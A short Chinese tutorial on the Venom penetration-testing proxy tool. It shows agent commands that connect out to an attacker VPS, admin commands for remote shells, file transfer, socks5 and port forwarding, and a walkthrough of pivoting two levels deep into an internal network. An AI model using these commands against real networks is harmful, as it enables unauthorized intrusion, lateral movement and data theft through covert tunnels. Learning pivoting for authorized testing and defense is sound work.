3.1 KiB
Executable File
3.1 KiB
Executable File
使用Venom搭建二级代理
来源:外部贡献
作者:悟空
收录时间:2022年10月25日
注:仅供openKyin社区兴趣研究、学习交流,切勿用于非法用途。
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点
下载地址:https://github.com/Dliv3/Venom
0x01使用
1.admin/agent命令行参数
- admin节点和agent节点均可监听连接也可以发起连接
admin监听端口,agent发起连接
./admin_linux_x64 -lport 9999
./agent_linux_x64 -rhost your_vps -rport 9999
agent监听端口,admin发起连接
./agent_linux_x64 -lport 9999
./admin_linux_x64 -rhost your_vps -rport 9999
2.admin节点内置命令
- help帮助信息
help 帮助信息
exit 退出
show 展示广告网络拓扑
Getdes 查看目标节点的描述
setdes [info] 向目标节点添加描述
goto [id] 选择id作为目标节点
listen [lport] 在目标节点上的端口上侦听
connect [rhost] [rport] 通过目标节点连接到新节点
sshconnect [user @ ip:port] [dport] 通过ssh隧道连接到新节点
Shell 在目标节点上启动一个交互式Shell
upload[local_file] [remote_file] 将文件上载到目标节点
download[remote_file] [local_file] 从目标节点下载文件
socks [lport] 启动socks5服务器
lforward [lhost] [sport] [dport] 将本地运动转发到远程dport
rforward [rhost] [sport] [dport] 将远程运动转发到本地dport
0x02 搭建二级代理
环境:
公网vps:xxx.xxx.xxx.xxx
一台linux服务器权限有公网出口,能访问内网资源:10.39.149.52
一台内网windows机器,可访问linux服务器,不能访问外网:192.168.0.66
先使用aadmin监听,agent发起连接,在vps和linux服务器上建立代理,使用listen 9997在linux服务器上开启监听
在内网windows机器使用如下命令,发起连接
agent.exe -rhost 10.39.149.52 -rport 9997
goto 2 操作节点
更多详细的用法查看官方文档
参考链接